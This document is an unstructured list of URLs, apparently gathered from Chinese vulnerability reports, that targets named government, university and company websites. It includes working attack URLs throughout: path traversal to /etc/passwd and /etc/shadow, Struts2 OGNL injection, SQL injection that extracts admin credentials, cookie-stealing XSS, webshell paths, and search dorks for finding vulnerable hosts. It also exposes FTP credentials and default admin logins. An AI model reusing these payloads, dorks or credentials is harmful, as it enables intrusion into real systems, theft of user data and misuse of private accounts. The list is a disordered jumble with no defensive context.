http://www.hnagri.gov.cn/login.jsp http://zwgk.xiangtan.gov.cn/login.jsp http://www.hunanpps.com/login.jsp http://www.hbt.hunan.gov.cn/login.jsp http://home.focus.cn/decorstuff/compare.php?sel_id_str=650099|&domain_type=59 http://home.focus.cn/decorstuff/compare.php?sel_id_str=650099'|&domain_type=59 http://park.digitalchina.com/cpyw.aspx?id=13 http://www.ecit.edu.cn/ http://ytc.ecit.edu.cn/UploadFiles/Document/201404/51827262077990499.asp http://dg.focus.cn/common/modules/databases/index.php?type=2&action=upload http://shop.focus.cn/.bash_history http://admin.shop.gz.focus.cn/.bash_history http://officeimg.focus.cn/.bash_history http://hn.focus.cn/common/group/topic/rdist6UubwK http://ncimg.focus.cn/common/group/v2012/rdistDrGywI http://yangzhou.focus.cn/common/group/topic/rdistauKEUx http://mis.nec.xmu.edu.cn/ExamPolicy!showExamList.action http://www.sztaiji.com/) inurl:indexAction.action inurl:zxjbAction_showInfo.action?wid= http://zwzx.anshun.gov.cn/indexAction.action http://zwzx.gzxy.gov.cn/indexAction.action http://nyzw.gov.cn/indexAction.action http://www.qzasc.cn/indexAction.action http://zwzx.xifeng.gov.cn/indexAction.action http://61.159.149.200/indexAction.action http://fuwu.donggang.gov.cn/indexAction.action http://211.140.246.58:8080/indexAction.action http://mdjsp.gov.cn/indexAction.action http://ddpas.dandong.gov.cn/indexAction.action http://61.186.220.71/xueji/login.aspx http://202.200.168.108/Login/loginpageforuserb.aspx?LogoutURL=%2flogin http://www.aviation-law.cn/ http://www.aviation-law.cn/aSoulkeys/ad_login.asp http://124.128.254.131:8484/status?full=true http://124.128.254.132:8484/status?full=true http://124.128.254.133:8484/status?full=true http://124.128.254.135:8484/status?full=true http://124.128.254.136:8484/status?full=true http://124.128.254.46:8484/status?full=true http://124.128.254.49:8484/status?full=true http://124.128.254.50:8484/status?full=true http://124.128.254.51:8484/status?full=true http://124.128.254.52:8484/status?full=true http://124.128.254.53:8484/status?full=true http://124.128.254.54:8484/status?full=true http://124.128.254.55:8484/status?full=true http://124.128.254.56:8484/status?full=true http://124.128.254.57:8484/status?full=true http://124.128.254.58:8484/status?full=true http://www1.swfc.edu.cn/wyx/admin/1ogin.asp http://www1.swfc.edu.cn/wyx/admin/WebEditor/ http://d.longtugame.com/daotadata/equipment?id=1 http://magazine.tcl.com/manager/login.aspx http://magazine.tcl.com/manager/ftb/help//ftb.imagegallery.aspx?rif=../upload&cif=../upload user:administrator http://www.xjdxyxt.com/, http://www.xjdxyxt.com/SearchResult.aspx?Key=1,key存在注入,中国电信某站漏洞威胁45W用户信息,详情看下面 http://dl.xjdxyxt.com/,用户名18196078834S01,密码123456 http://www.zhanqi.tv/u/login?redirect_on_login=xxx http://www.zhanqi.tv/game/6?ref=xxx http://www.tclbusiness.com/ http://zhaopin.longtugame.com/ http://zhaopin.longtugame.com/index.php?m=admin http://www.zhaoshang800.com/news/index.php?c=news&a=ajaxshow&id=35656 http://www.zhaoshang800.com/news/index.php?c=news&a=ajaxshow&id=35656'(错误) http://www.zhaoshang800.com/news/index.php?c=news&a=ajaxshow&id=35656 http://www.zhaoshang800.com/news/index.php?c=news&a=ajaxshow&id=35656 http://tts.ytoxl.com/login.htm http://tts.ytoxl.com/stockout/batch-searchShow.htm http://soft-sk.yonyou.com/service/jszc.jsp http://url:8012/selDept.php,可以暴露使用单位,http://url:8012/userlist.php,暴露用户名,http://url:8012/check.php,没有验证码,可以暴力破解用户名密码,下面是几个列子: http://www.jundoo.com.cn/col/col89/index.html http://58.213.129.204/infoms/identity/index.c http://58.213.129.204/infoms/identity/index.c http://aid.ec.js.edu.cn/infoms/visitor/dcjyZxsq-listXs.c http://aid.ec.js.edu.cn/infoms/visitor/dcjyZxsq-listXs.c http://61.153.216.102:8080/gw/admin/ http://moh.95001111.com/network/indexAction!indexMore.action?indexQuery.isPub=1&indexQuery.channelId=1 http://218.106.129.9:8080/jmx-console/ http://180.166.87.153/ http://www.qiaqiafood.com/company_news.aspx?id=143 http://www.qiaqiafood.com/upload/com3.11111111.asp http://uc.qudao.com/admin.php http://web.admin5.com/ http://w.mail.qq.com/cgi-bin/mobile?sid=【sid】接口登陆邮箱 http://www.cdjtysj.gov.cn/onews?id=440 bt:/pentest/database/sqlmap# http://www.cdjtysj.gov.cn/onews?id=440 bt:/pentest/database/sqlmap# http://www.cdjtysj.gov.cn/onews?id=440 http://115.182.21.40/market/editor/filemanager/browser/default/browser.html?Connector=connectors/jsp/connector http://118.186.205.204:8888 http://battery.tcl.com/read_news.php?id=31 http://xjd.tcl.com/showclick.asp?guid=20130422184740176 http://lighting.tcl.com/cn/products-d.aspx?ID=263&SortID=101 http://callcenter.tcl.com/tclcc/portlets/Examine/begin.do?form_id=3 php:123行 http://58.254.169.91:8080/ http://computer.cdu.edu.cn/1.asp http://www.rosebeauty.com.cn/member/register http://www.shangxueba.com/jingyan/1657263.html http://58.254.169.90/ admin:adminadmin http://ems.csdn.net/module/order/order/check_order?order_id=361 http://shop.tcl.com/ProductDetail/getConsult http://www.threeoa.com/product/501.html http://www.jmsyz.net/eeoaftp/downloadFile.action?path=WEB-INF/web.xml http://jdyz.ijd.cn/eeoaftp/downloadFile.action?path=WEB-INF/web.xml http://www.wxxqml.com/eeoaftp/downloadFile.action?path=WEB-INF/web.xml http://www.sxxazx.com:2012/eeoaftp/downloadFile.action?path=WEB-INF/web.xml http://booth.chanjet.com//sys/addUser.jsp http://booth.chanjet.com/statistic/email.jsp http://booth.chanjet.com/chanjet/login.do?method=getUsersByPager http://booth.chanjet.com/.svn/ http://newsletter.baidu.com/u.html?stime=1403762195&uid=baidu&eid=1309383&email=wooyun@qq.com&tlid=259&stid=1672&thid=259&url=IzEjaHR0cDovL25ld3NsZXR0ZXIuYmFpZHUuY29tL3Vuc3Vic2NyaWJlLmh0bWw/Z2lkPTImZW1haWw9d29veXVuQHFxLmNvbQ== http://newsletter.baidu.com/unsubscribe.html?gid=2&email=wooyun@qq.com http://www.exploit-db.com/ http://newsletter.baidu.com/u.html?stime=1403762195&uid=baidu&eid=1309383&email=wooyun@qq.com&tlid=259&stid=1672&thid=259&url=IzEjaHR0cDovL3d3dy5leHBsb2l0LWRiLmNvbS8= http://newsletter.baidu.com/unsubscribe.html?gid=2&email=wooyun@qq.com http://www.uniwin.com.cn/ http://221.194.46.67:8080/applyinfo/applyinfoSearch.jsp?disposecode=1'&submit=%b2%e9%d1%af inurl:index.do?templet=list_zbjh_zt http://ems.csdn.net/knowledge http://wooyun.org/bugs/wooyun-2010-054577 inurl:zxzx_show.jsp?ID http://www.ahly.gov.cn/hdcy/zxzx_show.jsp?ID=79 http://www.ahhbly.gov.cn/hdcy/zxzx_show.jsp?ID=79 http://www.ahaqly.gov.cn/hdcy/zxzx_show.jsp?ID=304 http://www.ahbbly.gov.cn/hdcy/zxzx_show.jsp?ID=28 http://www.ahczly.gov.cn/hdcy/zxzx_show.jsp?ID=105 http://www.ahxcly.gov.cn/hdcy/zxzx_show.jsp?ID=124 http://www.ahtlly.gov.cn/hdcy/zxzx_show.jsp?ID=34 http://www.ahfyly.gov.cn/hdcy/zxzx_show.jsp?ID=122 http://www.ahlaly.gov.cn/hdcy/zxzx_show.jsp?ID=53 http://www.ahbzly.gov.cn/hdcy/zxzx_show.jsp?ID=42 http://www.ahmasly.gov.cn/hdcy/zxzx_show.jsp?ID=30 http://www.ahchizly.gov.cn/hdcy/zxzx_show.jsp?ID=133 http://www.ahwhly.gov.cn/hdcy/zxzx_show.jsp?ID=44 http://www.ahhnly.gov.cn/hdcy/zxzx_show.jsp?ID=35 http://www.ahhflyj.gov.cn/hdcy/zxzx_show.jsp?ID=34 http://www.ahhsly.gov.cn/hdcy/zxzx_show.jsp?ID=34 http://www.ahwhly.gov.cn/hdcy/zxzx_show.jsp?ID=34 http://www.ahszly.gov.cn/hdcy/zxzx_show.jsp?ID=34 http://msdn.csdn.net/ http://www.moe.edu.cn/ucapformsresource/resourceservlet.ucap?key=/../../../../../../../../../../etc/httpd/conf/httpd.conf%00.jpg&filename=1.txt http://www.moe.edu.cn/ucapformsresource/resourceservlet.ucap?key=/../../../../../../../../../../etc/passwd%00.jpg&filename=1.txt http://127.0.0.1/phpcms/index.php?m=poster&c=index&a=poster_click&id=1 http://www.kanjian.com/user/116848/board/ http://data.sports.sohu.com/f1/driver_standings.php?season=2009 http://www.highcom.com.cn) intitle:GIP4 inurl:gip inurl:/gip/app/ http://www.hlsafety.gov.cn:8080/gip/FCKeditor/editor/filemanager/browser/default/browser.html?webSiteName=drbt&webSiteId=40287d4619c5fc0c0119c60a6de50001&Type=Image&Connector=connectors/jsp/connector http://www.hrbllw.gov.cn/gip/FCKeditor/editor/filemanager/browser/default/browser.html?webSiteName=drbt&webSiteId=40287d4619c5fc0c0119c60a6de50001&Type=Image&Connector=connectors/jsp/connector http://www.hljelder.com:8001/gip/FCKeditor/editor/filemanager/browser/default/browser.html?webSiteName=drbt&webSiteId=40287d4619c5fc0c0119c60a6de50001&Type=Image&Connector=connectors/jsp/connector http://www.hljtg.com/gip/FCKeditor/editor/filemanager/browser/default/browser.html?webSiteName=drbt&webSiteId=40287d4619c5fc0c0119c60a6de50001&Type=Image&Connector=connectors/jsp/connector http://202.118.192.149/gip/FCKeditor/editor/filemanager/browser/default/browser.html?webSiteName=drbt&webSiteId=40287d4619c5fc0c0119c60a6de50001&Type=Image&Connector=connectors/jsp/connector http://www.hegang.gov.cn/gip/FCKeditor/editor/filemanager/browser/default/browser.html?webSiteName=drbt&webSiteId=40287d4619c5fc0c0119c60a6de50001&Type=Image&Connector=connectors/jsp/connector http://www.drbt.gov.cn/gip/FCKeditor/editor/filemanager/browser/default/browser.html?webSiteName=drbt&webSiteId=40287d4619c5fc0c0119c60a6de50001&Type=Image&Connector=connectors/jsp/connector http://218.10.231.107/gip/FCKeditor/editor/filemanager/browser/default/browser.html?webSiteName=drbt&webSiteId=40287d4619c5fc0c0119c60a6de50001&Type=Image&Connector=connectors/jsp/connector http://www.gdfs.csg.cn/ http://www.gdfs.csg.cn/?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://www.gdst.csg.cn:80/manager/html/ username:admin http://www.im286.com/phpspy.php http://www.im286.com/1.asp;1.jpg http://www.im286.com/1.asp/2.jpg http://www.im286.com/1.jpg/1.php http://www.tylib.com/tyread/login/logOut.do http://www.tylib.com/tyread/test.txt http://lx.zzz4.com/list.asp?id=181 http://lx.zzz4.com/Stu_Show.asp?id=103 http://bit.tcl.com/ http://bit.tcl.com/phpsso_server/api/uc.php?code=17e6zArAIfR6iqzq592JgVl0r4K%2B%2BgukWcWso8N2As8wG%2Fh6bWh0HG%2BnkIJGBy2BYdhahpbohC6sCiW210k9Kq%2FSj%2F4%2BrWr0E9qqqTjLoTdGtJzTxExL0%2BnwK6KO0NkNL1OneyXIc%2BsOCrt6zBAcnsu%2Bolqdq1nHNulr861WhdO4Gw4zxyqOZW03zIV1fQplEV35U4iJ8aE http://bit.tcl.com/phpsso_server/api/uc.php?code=c083du8enogt4QbzvHeM8GbShlbtSbr1V0dDABJcdgCOpa%2Fx15lsCqVq8oKorQoUixsoWalIzsxW6%2FjaHsMSWVZSqhKwXTYjAgFX5JlMGVsM6YmEVWHoNXNoa%2FyNgIRDDHT0H8Vl64GgbsO%2FFT2sQE%2F5ZsQzwwBrybF5kaT%2B3ddNPaHQucnbqNIkBUdOaiBgyNMaxO%2Fd31t0gd7BePoQWAxF76yLx0As6cy8wDUvQ%2BWPlov85G70%2FVvfKzrg3gTQRNMvLgay http://bit.tcl.com/index.php?m=admin&c=index&a=login&pc_hash= http://bbs.paidai.com/topic/191776 http://edu.zzz4.com/list.asp?id=57 http://218.247.135.37:91/Web_sc/login.gn,邮航单点登录系统,用户名是用某种方式设置的,有初始密码,所以尝试了几个就进系统中了。 http://sms.cnpostair.com/login.jsp,中国邮政航空安全管理系统,用户名也是用某种方式设置的,有初始密码,所以尝试了几个就进系统中了。 http://220.178.27.116:8001/background/recievesms.php?ID=1 http://220.178.27.116:8001//background/recievesms.php?ID=1 http://yindajituan.gicp.net:8888 www.kdlian.com:8001 com:8080 cn:8080 cn:8080 com:8088 www.huazhu.com http://www.365bj.com/about/Default/index/id/3.html http://www.baic.gov.cn/infogate/file/file_server_read.jsp?FileName=/../../../../../../../../../etc/shadow http://rz1.ipnoc.cn:8090 http://caiyun.feixin.10086.cn/dl/161fmlOwpIa1 http://wangba.wanmei.com/xljz/getxljzbar.do?search.proId=0&search.cityId=0&search.sectionId=0&search.barName=&page=123 http://wangba.wanmei.com/xljz/getxljzbar.do?search.proId=0&search.cityId=0&search.sectionId=0&search.barName=&page=123 http://wangba.wanmei.com/xljz/getxljzbar.do?search.proId=0&search.cityId=0&search.sectionId=0&search.barName=-- http://juwl.m.taobao.com/admin/item_home.htm www.yoro.com http://admin.yoro.com/ http://admin.yoro.com/advertisement/toAdOfs.html?id=1 http://pan.baidu.com/mbox/homepage#share/type=session http://www.good321.net/web.zip http://www.shic.gov.cn:8080/xxzxbbs/blog_people.jsp?people=615 http://www.czpost.com.cn/ http://golf.cctv.com/e/extend/court/score.php?cid=115&hole=1,参数hole inurl:ucapformsresource inurl:sofpro xxx.com/ucapformsresource/resourceservlet.ucap?key=/../../../../../../../../../../etc/httpd/conf/httpd.conf%00.jpg&filename=1.txt http://220.178.27.116:8001//background/festivalremind.php?ID=99999 http://220.178.27.116:8001//background/festivalremind.php?ID=99999 www.kdlian.com:8001 com:8080 cn:8080 http://service.wanmei.com/faxservice/AttachUploadShowAction.do?flag=1&serviceCode=1365171718702 http://service.wanmei.com/faxservice/AttachUploadShowAction.do?flag=1&serviceCode=1365171718702 http://service.wanmei.com/faxservice/AttachUploadShowAction.do?flag=1&serviceCode=1365171718702 http://passport.wanmei.com/sso//accounts/serviceLogin?continue=http://tg.wanmei.com:80/SSOServerLogin&service=qdwmqc&location=2f70617373706f72742f696e666f2e6a7370&encryptType=RSA&isiframe=1&CSSStyle=http://tg.wanmei.com:80/passport/style/iframecss.css&mydate=0.9401589958864233&mydate=0.6164330805626539 http://gz.ifeng.com/zaobanche/detail_2014_06/26/2494927_0.shtml http://news.ifeng.com/a/20140627/40919389_0.shtml www.cmec.com进行友情检测吧 www.tietu.com ip:118.186.217.77 http://page.renren.com/601633405 http://baike.baidu.com/view/1726431.htm http://tech.sina.com.cn/i/2013-01-21/11057999317.shtml http://202.108.154.209/datacenter/# https://atservice.intel.com/login.action https://atservice.intel.com/login.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://wan.07073.com/.svn/entries http://dota2.07073.com/static/upload/ http://bbs.qibosoft.com/down2.php?v=v7#down http://192.168.1.108/e/order/order1.aspx?s=1&table=product&id=28 order1:Page http://ebaotong.com:8080/ebt/pty/loginSystem.action http://ebaotong.com:8080/ebt/x.jsp http://125.ahncgl.org/login.action http://www.autohome.com.cn/ashx/AjaxAccountInfo.ashx?users=3914441 http://www.autohome.com.cn/ashx/AjaxAccountInfo.ashx?users=3914441 http://www.exploit-db.com/exploits/30085/ https://mail.iboxpay.com/zimbra/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00 http://yunfeng.zju.edu.cn/news.php?action=show&id=4036 http://dqxy.zju.edu.cn/news.php?action=show&id=7553 www.qsng.cn inurl:/helper/reg.do http://www.tzqsng.com/helper/reg.do http://www.huzhouqsng.com/helper/reg.do http://www.wzqsn.com/helper/reg.do http://www.txqsng.cn/helper/reg.do http://sdh.zjsxd.org/helper/reg.do http://www.cnqsng.cn/helper/reg.do http://www.ajqsn.com/helper/reg.do http://www.nhqsng.com/helper/reg.do http://www.yhqsng.com.cn/helper/reg.do http://www.wlqsng.cn/helper/reg.do http://www.jnqsng.cn/helper/reg.do http://www.jdqsng.com/helper/reg.do http://www.wzstx.net/helper/reg.do http://ip:port/ServiceAction/com.velcro.base.DataAction?sql=select/**/@@VERSION http://www.baidu.com/s?wd=%E6%B5%81%E7%A8%8B%E7%AE%A1%E9%81%93%2C%E7%9F%A5%E8%AF%86%E6%B4%BB%E6%B0%B4&rsv_spt=1&issp=1&rsv_bp=0&ie=utf-8&tn=baiduhome_pg&rsv_sug3=1&rsv_sug4=64&inputT=692 http://kms.kogc.com.cn/ServiceAction/com.velcro.base.DataAction?sql=select/**/@@VERSION http://www.hnxzsp.gov.cn/VerifyImageAction http://zfxx.haining.gov.cn/bsdt/VerifyImageAction http://swift.51mrp.com/mopo/index.html http://4g.roboo.com/ http://as.baidu.com/a/item?docid=4154506839&f=web_alad_2_2 http://down.chinaz.com/soft/34989.htm http://www.nj12320.org/njmine/findPassword.do?type=start http://www.nj12320.org/njres/ http://www.hnleader.gov.cn/Index/City/ViewCityNews/?NewsID=4592 http://market.m.taobao.com/go/market/diandian/catetime.php# http://www.ecosopp.com https://hr.minshengec.cn/hrss/login.jsp http://wenku.baidu.com/view/252b4448e518964bcf847ccb?fr=prin https://hr.minshengec.cn/hrss/ELTextFile.load.d?src=../../ierp/bin/prop.xml https://hr.minshengec.cn/login.jsp http://www.huazhu.com/myht/InvoiceManage.ashx http://www.yf1668.com/index.asp http://112.124.41.23:38888/ http://112.124.41.23:38888/Default.aspx http://112.124.41.23:38888/NWorkFlow/NWorkFlowReView.aspx?WorkFlowID=31 http://112.124.41.23:38888/NWorkFlow/NWorkFlowReView.aspx?WorkFlowID=31 http://112.124.41.23:38888/SystemManage/SystemUser.aspx http://112.124.41.23:38888/FGOA_NetDisk/NetDisk.aspx?ID=1&SubDir=C:\Program http://112.124.41.23:38888/FGOA_NetDisk/NetDisk.aspx?ID=1&SubDir=D:\ http://112.124.41.23:38888/FGOA_NetDisk/NetDisk.aspx?ID=1&SubDir=D:\OA_SITE\FGOA2014\Web9.2.2.7 http://112.124.41.23:38888/UploadFile/635395514206637345.aspx http://dthb.bjedu.cn/checkcmisa.php http://www.umeweb.cn/ http://218.6.145.99:8088//cmis/common/usersAction_login.action http://club.voicecloud.cn/static/image/common/logo.png/.php http://demo.pageadmin.net/index.aspx?lanmuid=68&sublanmuid=635&id=1 http://demo.pageadmin.net/index.aspx?lanmuid=68&sublanmuid=635&id=2 http://demo.pageadmin.net/index.aspx?lanmuid=68&sublanmuid=635&id=10 http://etl.moonbasa.com/recommend.aspx?callback=jQuery17 http://a.vupload.duowan.com/index.php?r=recommend/get&channel%5Fid=cod&letv%5Fvideo%5Funique=dee5673396 http://a.vupload.duowan.com/index.php?r=anuncio/getanuncio http://player.vupload.duowan.com/index.php?r=videoservice/get&video%5Fid=139770260956853710&letv%5Fvideo%5Funique=dee5673396 http://sso.gdems.com/sso/login http://www.emscz.com:8080/login.jsp http://www.czpost.com.cn/admin/login.asp http://61.163.228.116:7001/login.jsp http://sswz.spb.gov.cn/logout.do http://www.10008.co/ www.10008.co http://www.10008.co http://www.sqjrw.cn/_database/5d7525e61ca2ae39.mdb http://jw.sicnu.edu.cn/show.asp?id=551 http://jw.sicnu.edu.cn/show.asp?id=551 http://jw.sicnu.edu.cn/show.asp?id=551 http://jw.sicnu.edu.cn/show.asp?id=551%20and%201=1%20union%20select%201,username1,3,4,5,6,password1,8,9,10,11%20from%20admin http://jw.sicnu.edu.cn/login.asp http://www.kmpsoft.com/index.htm http://www.kmpsoft.com/solution.htm http://demo.kmpsoft.com/ http://www.douban.com/j/app/login?email={email}&password={password}&app_name=radio_desktop_win&version=50 http://www.cites-sh.com.cn/user!indexPage.do http://bbs.wan.58.com/static/image/common/flvplayer.swf?file=http://www.p-ye.cn/1.flv&autostart=false&image=http://www.url.com/images/banner.jpg&linkfromdisplay=true&link=javascript:alert%281%29 http://www.zhihu.com/question/21596439 http://118.194.166.130/ http://118.194.166.130:81/ http://www.lnjxt.net http://www.lnjxt.net/jxt_web/res/resinfo.jsp?file_id=1141&res_sort=2 http://www.lnjxt.net/admin/index.jsp,用户名lnjxt_login http://so.126disk.com/search?key=1 http://sfjd.miit.gov.cn/InfoAction!showDetail.action http://sfjd.miit.gov.cn/kindeditor/cmd.jsp?cmd=net http://www.ttyoa.com/WebDst/index.htm?TopMenu=sy http://www.ttyoa.com/Main3/sy.jsp http://www.ttyoa.com/Common/Js/WebEdit/UploadFile.action.jsp?objWebEditName=myWebEdit&Yuan_FileName=404.jsp&IdTime=2014-06-29-5-29-20&FileName=Upload_2014-06-29-5-29-20_404.jsp&szUpLoadPath=DB&Upload_Div_FuJian=myWebEdit_UploadShow&UploadType=File http://www.ttyoa.com/Common/Js/WeiBoEdit/UploadFile.action.jsp?objWeiBoEditName=myWebEdit&Yuan_FileName=404.jsp&IdTime=2014-06-29-5-29-20&FileName=Upload_2014-06-29-5-29-20_404.jsp&szUpLoadPath=DB&FileType=File http://www.ttyoa.com/Qxk/SysManage/Person/UploadFile.action.jsp?Yuan_FileName=404.jsp&IdTime=2014-06-29-5-31-48&FileName=WeiBo_2014-06-29-5-31-48_404.jsp&szUpLoadPath=OA/DB&Yuan_Path=404.jsp&LeiXing=2 http://www.ttyoa.com/WebDst/index.htm?TopMenu=sy http://www.ttyoa.com/Main3/sy.jsp http://www.ttyoa.com/Common/Js/UploadEx/do_download.jsp?UpLoadPath=/Common/Js/UploadEx/&FileName=do_download.jsp http://active.game.xunlei.com/blog/wp-login.php,wordpress,多个用户弱口令: http://member.china-pub.com/member/mypub/pub_orderlist.aspx页面,我的订单下拉列表会触发一个get请求,内容如下: http://survey.ifeng.com/api/resultflashdata.php?surveyId=8133&format=json&type=survey&time=1337256627597 http://211.103.239.83:8090/tb/login.jsp http://bbs.t2cn.com/static/image/common/flvplayer.swf?file=http://www.p-ye.cn/1.flv&autostart=false&image=http://www.url.com/images/banner.jpg&linkfromdisplay=true&link=javascript:alert%28document.cookie%29 https://www.google.com.hk/webhp?hl=zh-CN&sourceid=cnhp#hl=zh-CN&newwindow=1&q=inurl:/custom/GroupNewsList.aspx&safe=strict&start=50 http://bbs.anzhi.com/config/.config_global.php.swp http://data.ucweb.com/ucweb_admin/login.php http://121.14.161.216:8039/ http://group.fumu.com/config/config_ucenter.php.bak http://ie.sogou.com/ http://121.192.179.132:81/ems/index.php?m=apply&c=apply&a=search http://i3.wkimg.com/config.inc.php.bak http://www.jledu.gov.cn/chengji_2014.php?ksh=考生号&xm=姓名 http://www.jledu.gov.cn/chengji_2014.php?ksh='&xm= http://www.jledu.gov.cn/chengji_2014.php?ksh=\&xm=or%20ksh=14220821150199%23 http://www.jledu.gov.cn/chengji_2014.php?ksh=\&xm=or%20ksh=14220821150199%23 http://www.jledu.gov.cn/chengji_2013.php?ksh=\&xm=or%20ksh=13220821150199%23 http://www.jledu.gov.cn/chengji_2012.php?ksh=\&xm=or%20ksh=12220821150199%23 http://www.jledu.gov.cn/chengji_2011.php?ksh=\&xm=or%20ksh=11220821150199%23 http://www.jledu.gov.cn/luqu_2013.php?kshb=考号&xmb=姓名 http://dealer.xcar.com.cn/d/search/s.htm http://wifi.liebao.cn/hd/wifikong/result.php?id=15636 http://demo.cnnitc.com/download.php?tfile=\..\..\config.php http://pan.wxhand.com/ http://221.122.51.13/ http://youxi.vip.qq.com/game/zhuanqu/v5.html?id=cf&ADTAG=youxi.vip.qq.com/game/zhuanqu/v5.html&SNO=1404046447255 http://pinyin.sogou.com/bbs/ http://bbs.maxthon.cn/forum.php http://jh.ourgame.com/jh.ourgame.com.rar http://dev.focus.cn/common/modules/survey.tar.gz site:img.china.alibaba.com site:img.china.alibaba.com site:img.china.alibaba.com http://img.china.alibaba.com/club/upload/user/8/b/e/4/8be42260fe52cc084be3e8482f0ad56c.txt http://www.bjstats.gov.cn/wwhd/QueryFaq3.do http://58.215.183.168/ http://58.215.183.169/ http://58.215.183.172/ http://地址/manager_log_conf_t.gch http://地址/manager_dev_config_t.gch http://地址/manager_dev_defcfg_t.gch http://58.255.211.141/manager_dev_defcfg_t.gch http://地址/manager_log_conf_t.gch http://地址/manager_dev_config_t.gch http://地址/manager_dev_defcfg_t.gch http://58.255.211.141/manager_dev_defcfg_t.gch http://edu.chanjet.com/Exam.rar http://bbs.11186.com/uc_server/ http://bbs.aqgj.cn/ http://dc.km.gov.cn/gov/list.ashx?id=1 http://dbcx.km.gov.cn/JyjSearch.asp?Check=list&@f_zhengxie_num=126 http://cr.ctbu.edu.cn/ http://cif.ctbu.edu.cn/ http://vip.esf.focus.cn/ http://bbs.kingsoft.com/ http://bbs.wps.cn http://www.sparklan.com/p2-products-detail.php?PKey=c33dIvahuWbzpkuB-Mvy1_Fz0DmF0T8VP_GG7A5Vzic&CAS-673W cn:8080 inurl:ProductShow.asp?ArticleID= inurl:ProductShow.asp?ArticleID= inurl:ProductShow.asp?ArticleID= http://www.aywsxxw.com/ http://zjcsnz.zje.net.cn/ http://hbkd.hdt.net.cn/ http://press.ujs.edu.cn/ http://nyhg.nxtc.edu.cn/ http://jpkc.sdili.edu.cn/ http://www.xaau.edu.cn/ http://sz.jnu.edu.cn/ http://www.dyfg.gov.cn/ http://mmzx.maoming.gov.cn/ http://www.lldm.gov.cn/ http://www.lchfda.gov.cn/ http://www.fmxgaj.gov.cn/ http://www.jsxyjs.gov.cn/ http://www.xyqts.gov.cn/ http://61.134.97.248/ http://www.jiesc.com/ http://www.xyslj.gov.cn/ http://www.tqjcy.gov.cn/ http://o.p.dianping.com/http/orderReturn?msg=%3Cscript%3Edocument.getElementsByClassName%28%27box-cont%20box-cont-w%27%29[0].innerHTML=%27%3Ch2%3E%E6%94%AF%E4%BB%98%E6%88%90%E5%8A%9F%3C/h2%3E%E4%BB%98%E6%AC%BE%E5%AE%8C%E6%88%90%27%3C/script%3E http://gjsxy.imut.edu.cn/admin/user_login.asp http://glxy.imut.edu.cn/jpinkcheng/news/manage/login/login.asp http://www.ies.imut.edu.cn/EduAdmin/Admin_Login.aspx http://www.lib.imut.edu.cn/dtxw/news/5531.html http://www.ies.imut.edu.cn/SchoolMate/SchoolMateList.aspx?C_ID=1117 http://220.181.47.7/login.php http://t.cn/RvG5w6B http://item.taobao.com/item.htm?spm=a230r.1.14.24.MGOHvR&id=391369** http://tbodn.com/pj.css http://tbodn.com/pj.css http://fuwu.taobao.com/ser/detail.htm?spm=a1z13.1113643.1113643.37.LxWCue&service_code=TADGET_SHOP_TACTIC&tracelog=search&scm=&ppath=&labels= tbodn.com/pj.css http://community.bank.ecitic.com/CommunityWcm/ccbcache/zh/ns:LHQ6OCxmOjEzLGM6LHA6LGE6LG06/channel.vsml http://point.4006055885.com/ http://www.4006055885.com/tjoa/ www.51dns.com http://218.28.172.10/oa/loginPwd.jsp http://www.gdmz.gov.cn/bbs/forumdisplay.php?fid=1++&extra%5B%5D=page%3D1#pid1453 http://www.gdmz.gov.cn/xampp/ http://ygb.tongji.edu.cn/information.php?newsid=49 url:http://www.finereason.com http://loudong.360.cn/company/info/id/43 http://www.56top.cn/queryStartDeployOrderCargoInfo.action http://www.ems.com.cn/ec-web/findPassword/findPasswordIndex.action https://mail.11185.cn/logon/findPasswordThree.do?username=test@11185.cn&type=m http://www.finereason.com/ url:http://www.finereason.com https://yp.bianfeng.com/dashboard/pages/ https://yp.bianfeng.com/dashboard/pages/optool_webport_list.html ftp://download:iRVnsT,mj@115.238.24.173:6005/HuaiAn ftp://download:iRVnsT,mj@115.238.24.173:6005/HuaiAn ftp://webupload:wTVPxBybVn@210.51.31.123:6005/xml http://yp.bianfeng.com:8080/phpinfo.php https://yp.bianfeng.com/inner/operation/source/.svn/entries http://地址/manager_dev_config_t.gch http://58.255.222.203/manager_dev_config_t.gch http://m.aibo123.com/bet/betbifenData.do http://地址/rom-0 http://27.37.52.36/rom-0 http://地址/getpage.gch?pid=1002&nextpage=manager_log_conf_t.gch http://地址/getpage.gch?pid=1002&nextpage=manager_dev_config_t.gch http://地址/getpage.gch?pid=1002&nextpage=manager_dev_defcfg_t.gch http://27.37.53.126/getpage.gch?pid=1002&nextpage=manager_dev_defcfg_t.gch http://app.hebwst.gov.cn:30000/hebxzwsxt/ http://221.192.132.203:8091/zyxtgl/login.jsp?error=0 http://comp.yonyou.com//shell.jsp http://comp.yonyou.com/hr/sm/Sm_index.action;jsessionid=BD01456221D66A12061773C6EE4315D0 http://mail.bjhjyd.gov.cn/admin/password.php?password=admin&password2=admin http://地址:8081/param.file.tgz http://125.93.86.75:8081/param.file.tgz http://u6dmp.ufida.com.cn http://www.wishtech.com.cn/ http://www.wishtech.com.cn/aboutus/custemers.shtml http://210.56.192.102 http://210.56.192.102/qwareinfo/oa/pubinfo/document/mydoc.json?_dc=1404109910298 http://210.56.192.102/qwareinfo/oa/pubinfo/document/mydoc.json?_dc=1404109910298 http://bbs.aili.com/forum.php http://www.library.tjau.edu.cn/webs/down.action 